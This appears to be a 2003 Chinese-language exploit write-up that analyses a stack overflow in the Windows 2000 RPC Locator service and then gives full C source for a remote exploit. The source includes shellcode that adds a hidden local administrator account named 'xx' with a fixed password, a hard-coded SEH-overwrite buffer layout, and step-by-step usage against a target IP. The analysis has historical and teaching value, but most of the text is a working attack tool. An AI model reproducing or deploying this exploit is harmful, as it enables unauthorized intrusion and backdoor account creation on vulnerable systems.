【分析】MS RPC LOCATOR Service Exploit for win2k(new version)

MS RPC LOCATOR Service Exploit for win2k(new version)

创建时间：2003-04-07
文章属性：原创
文章提交： eyas (ey4s_at_21cn.com)

/*------------------------------------------------------------------------------------
Created at:        2003-04-05
Last updated:    2003-04-07
      前几天在packetstorm下载rpcexp.c试了试，没成功，但locator服务却当掉了。于是便想看看到底怎么
回事。后来找到点资料，原来是个stack溢出，问题出在wcscpy函数。跟踪了一下，函数调用关系是
这样的:

locator!Locator::nsi_binding_lookup_begin:
    |__locator!Locator::nsi_binding_lookup_begin_name:
        |__locator!CRemoteLookupHandle::finished:
            |__locator!CBroadcastLookupHandle::initialize:
                |__locator!getBroadcastResults
                    |__locator!formQueryPacket
                        |__wcscpy     <-- buff overflow


    getBroadcastResults函数的返回地址在buff+0x514处，经测试，win2k中文、英文 sp0-3版本的
溢出点都一样。但是如果覆盖getBroadcastResults函数的返回地址，在locator!formQueryPacket
后面的代码运行会出现0xC0000005错误，这样的话，那就只好覆盖SEH了。Exception Handler地址
存放在buff+0x504处，中英文sp0-3版本都一样。Marcin Wolak写的rpcexp.c 的jmpaddr为0x0090F8F0，
我估计这个地址是他自己在测试的时候，shellcode存放的地址，他在SEH处直接跳到shellcode去了，
因为我在测试的时候，wcscpy将我们的buff copy到0x009xxxxx附近，当然， 这在不同平台上测试的
时候会有所不同，甚至相差很大。仅仅是猜测而已，因为我初学这个，看不懂他的代码:(。

    改写后的SEH显然在这里指向jmp esp是不行了，后来跟踪的时候发现， 当Exception发生后，
Windows系统正准备处理Exception的一刹那间，寄存器ebx正好指向当前存放Exception Handler地址的
地址-4，即是说假如Exception Handler地址存放在0x0098F8EC，那么EBX值就为0x0098F8E8。这样的话，
改写Exception Handler地址为call ebx的地址就可以执行我们的shellcode了。后来回过头来看莫大
的文章时，才看到在他文章里面这个已经写的比较详细了，我看资料太不认真了:(。不过莫大没有说
原理，所以到底为什么会这样，我也不知道。

    call ebx的地址在不同平台上并不通用，后来看了一下各平台上的locator.exe版本，发现sp0、sp1
中版本为都为5.0.2195.1，sp2版本为5.0.2195.2505，sp3版本为5.0.2195.3761，打过补丁后的版本
为5.0.2195.6136。locator.exe版本改动较少，于是便决定用locator.exe里面的call ebx地址，kernel32
这些dll，几乎每个hotfixs都要更新，用里面的call ebx地址就很不通用了。

    搜索的时候发现sp1、sp2中call ebx地址相同的有10个，sp1和sp3中有一个相同地址，sp2和sp3
无相同地址。但是也发现一个很好玩的地方，例如sp1中在0x0100a8eb有call ebx，那么sp3中在0x0100a8ec
也有个call ebx，嘿嘿。。
    
    经过比较，jmp addr我决定用0x0100AEE5，在sp0、sp1、sp2中，
0:004> u 0x0100AEE5
0100aee5 ffd3             call    ebx
    在sp3中，    
0:004> u 0x0100AEE5
0100aee5 40               inc     eax
0100aee6 ffd3             call    ebx

    我们发送的buff结构如下:
|rpc_head_info?(8)|NOP(0x4F8)|jmp 0xA(2)|NOP(2)|call ebx addr(4)|NOP(4)|shellcode|

    shellcode没什么特殊要求，只要没有"/x00/x00"就可以了，不然会被wcscpy截短。
    shellcode代码大部分直接来自莫大的文章，感谢他，感谢莫大、backend、ipxodi等精彩的
关于windows平台缓冲区溢出的文章。
-------------------------------------------------------------------------------------*/
#define UNICODE
#define RPC_UNICODE_SUPPORTED

#include <stdio.h>
#include <rpc.h>
#include <rpcnsi.h>

#pragma comment(lib, "rpcns4.lib")

//SEH Handler地址偏移,win2k所有版本溢出点都一样
#define    sehoffset    0x504
//call ebx addr in locator.exe process
/*
sp0 sp1 sp2
0:004> u 0x0100AEE5
0100aee5 ffd3             call    ebx
sp3    
0:004> u 0x0100AEE5
0100aee5 40               inc     eax
0100aee6 ffd3             call    ebx
*/
#define    JMPADDR "/xE5/xAE/x00/x01"
#define    JMPOVER "/xEB/x0A/x90/x90"//jmp    0xa

//hey,guy,you should modify this code slightly by yourself.
char shellcode [] =
"/x55/x8B/xEC/xEB/x64/x5A/xB8/x04"
"/x00/xF1/x77/x81/x38/x4D/x5A/x90"
"/x00/x74/x03/x48/xEB/xF5/x8B/xD8"
"/x8B/x73/x3C/x03/xF3/x8B/x76/x78"
"/x03/xF3/x8B/x7E/x20/x03/xFB/x8B"
"/x4E/x14/x33/xED/x56/x57/x51/x8B"
"/x3F/x03/xFB/x8B/xF2/x33/xC9/x83"
"/xC1/x0E/xF3/xA6/x74/x08/x59/x5F"
"/x83/xC7/x04/x45/xE2/xE7/x59/x5F"
"/x5E/x8B/xCD/x8B/x46/x24/x03/xC3"
"/xD1/xE1/x03/xC1/x33/xC9/x66/x8B"
"/x08/x8B/x46/x1C/x03/xC3/xC1/xE1"
"/x02/x03/xC1/x8B/x00/x03/xC3/xEB"
"/x02/xEB/x37/x8B/xFA/x8B/xF2/x89"
"/x06/x83/xC7/x0F/x57/x53/xFF/xD0"
"/x83/xC6/x04/x89/x06/x83/xC7/x08"
"/x57/x53/x8B/x46/xFC/xFF/xD0/x83"
"/xC6/x04/x89/x06/x33/xC0/x50/x83"
"/xC7/x06/x57/x8B/x46/xFC/xFF/xD0"
"/xB8/xFF/xFF/xFF/xFF/x50/x8B/x06"
"/xFF/xD0/xE8/x5E/xFF/xFF/xFF"
"getprocaddress""/x0"
"winexec""/x0"
"sleep""/x0"
"cmd /c net.exe user xx 1a!.9nH /add && net localgroup administrators xx /add";

DWORD WINAPI func(LPVOID lp)
{
    unsigned char    buff[4000];
    unsigned short * pszStrBinding = NULL;
    RPC_NS_HANDLE hnsHandle;
    unsigned long NsSntxType = RPC_C_NS_SYNTAX_DEFAULT;
    RPC_STATUS status;
    unsigned long i;

    //填充buff
    buff[0] = '/';
    buff[1] = 0;
    buff[2] = '.';
    buff[3] = 0;
    buff[4] = ':';
    buff[5] = 0;
    buff[6] = '/';
    buff[7] = 0;
    for (i=8;i<sehoffset-4;i++)
    {
        buff[i] = '/x90';
    }
    strcpy(&buff[i], JMPOVER);
    //jmpaddr可能包含有0
    memcpy(&buff[i+4], JMPADDR, 4);
    strcpy(&buff[i+8], "/x90/x90/x90/x90");
    memcpy(&buff[i+12], shellcode, sizeof(shellcode));

    RpcTryExcept
    {
        status = RpcNsBindingLookupBegin(NsSntxType,
                                         (unsigned short *) buff,
                                         0,
                                         NULL,
                                         0,
                                         &hnsHandle);
            printf("RpcNsBindingLookupBegin returned 0x%x/n", status);
    }
    RpcExcept(1)
    {
        printf("RPC Runtime raised exception 0x%x/n", RpcExceptionCode());
    }
    RpcEndExcept
    return 0;
}
void usage()
{
        printf( "/nxLocator -- MS RPC LOCATOR Service Exploit for win2k_en_cn_sp0-3/n"
                "Author: cooleyas@21cn.com 2003-04-07/n"
                "Based on Marcin Wolak/'s rpcexp.c/n/n"
                "usage:/n"
                "1.Set registry values in Your workstation as below:/n"
                "   HKLM//SOFTWARE//Microsoft//Rpc//NameService//NetworkAddress = targetIP/n"
                "   HKLM//SOFTWARE//Microsoft//Rpc//NameService//ServerNetworkAddress = targetIP/n"
                "2.Establish null session: net use targetIP//ipc$ /"/"/u: /"/"/n"
                "3.Run Exploit: xLocator/n"
                "  if success,target will add a user /"xx/" passwd is /"1a!.9nH/"./n");
}
void _CRTAPI1 main(int argc, char **argv)
{
    
    if(argc!=1)
    {
        usage();
        exit(0);
    }
    CreateThread(NULL, 0, func, NULL, 0, NULL);
    Sleep(4000);
    printf("Done./n");
} /*End of Main*/